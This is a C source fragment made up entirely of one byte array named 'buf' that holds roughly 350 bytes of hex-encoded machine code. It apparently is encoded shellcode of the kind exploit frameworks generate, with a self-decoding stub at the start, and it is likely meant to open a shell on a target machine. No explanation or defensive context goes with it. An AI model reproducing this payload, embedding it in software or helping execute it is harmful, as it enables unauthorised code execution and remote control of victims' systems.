unsigned char buf[] = 
"\xb8\x93\x01\x17\x76\xda\xc6\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x52\x31\x46\x12\x83\xc6\x04\x03\xd5\x0f\xf5\x83\x25\xe7\x7b"
"\x6b\xd5\xf8\x1b\xe5\x30\xc9\x1b\x91\x31\x7a\xac\xd1\x17\x77"
"\x47\xb7\x83\x0c\x25\x10\xa4\xa5\x80\x46\x8b\x36\xb8\xbb\x8a"
"\xb4\xc3\xef\x6c\x84\x0b\xe2\x6d\xc1\x76\x0f\x3f\x9a\xfd\xa2"
"\xaf\xaf\x48\x7f\x44\xe3\x5d\x07\xb9\xb4\x5c\x26\x6c\xce\x06"
"\xe8\x8f\x03\x33\xa1\x97\x40\x7e\x7b\x2c\xb2\xf4\x7a\xe4\x8a"
"\xf5\xd1\xc9\x22\x04\x2b\x0e\x84\xf7\x5e\x66\xf6\x8a\x58\xbd"
"\x84\x50\xec\x25\x2e\x12\x56\x81\xce\xf7\x01\x42\xdc\xbc\x46"
"\x0c\xc1\x43\x8a\x27\xfd\xc8\x2d\xe7\x77\x8a\x09\x23\xd3\x48"
"\x33\x72\xb9\x3f\x4c\x64\x62\x9f\xe8\xef\x8f\xf4\x80\xb2\xc7"
"\x39\xa9\x4c\x18\x56\xba\x3f\x2a\xf9\x10\xd7\x06\x72\xbf\x20"
"\x68\xa9\x07\xbe\x97\x52\x78\x97\x53\x06\x28\x8f\x72\x27\xa3"
"\x4f\x7a\xf2\x64\x1f\xd4\xad\xc4\xcf\x94\x1d\xad\x05\x1b\x41"
"\xcd\x26\xf1\xea\x64\xdd\x92\x1e\x72\xdd\x8f\x77\x86\xdd\x4e"
"\x33\x0f\x3b\x3a\x53\x46\x94\xd3\xca\xc3\x6e\x45\x12\xde\x0b"
"\x45\x98\xed\xec\x08\x69\x9b\xfe\xfd\x99\xd6\x5c\xab\xa6\xcc"
"\xc8\x37\x34\x8b\x08\x31\x25\x04\x5f\x16\x9b\x5d\x35\x8a\x82"
"\xf7\x2b\x57\x52\x3f\xef\x8c\xa7\xbe\xee\x41\x93\xe4\xe0\x9f"
"\x1c\xa1\x54\x70\x4b\x7f\x02\x36\x25\x31\xfc\xe0\x9a\x9b\x68"
"\x74\xd1\x1b\xee\x79\x3c\xea\x0e\xcb\xe9\xab\x31\xe4\x7d\x3c"
"\x4a\x18\x1e\xc3\x81\x98\x2e\x8e\x8b\x89\xa6\x57\x5e\x88\xaa"
"\x67\xb5\xcf\xd2\xeb\x3f\xb0\x20\xf3\x4a\xb5\x6d\xb3\xa7\xc7"
"\xfe\x56\xc7\x74\xfe\x72";
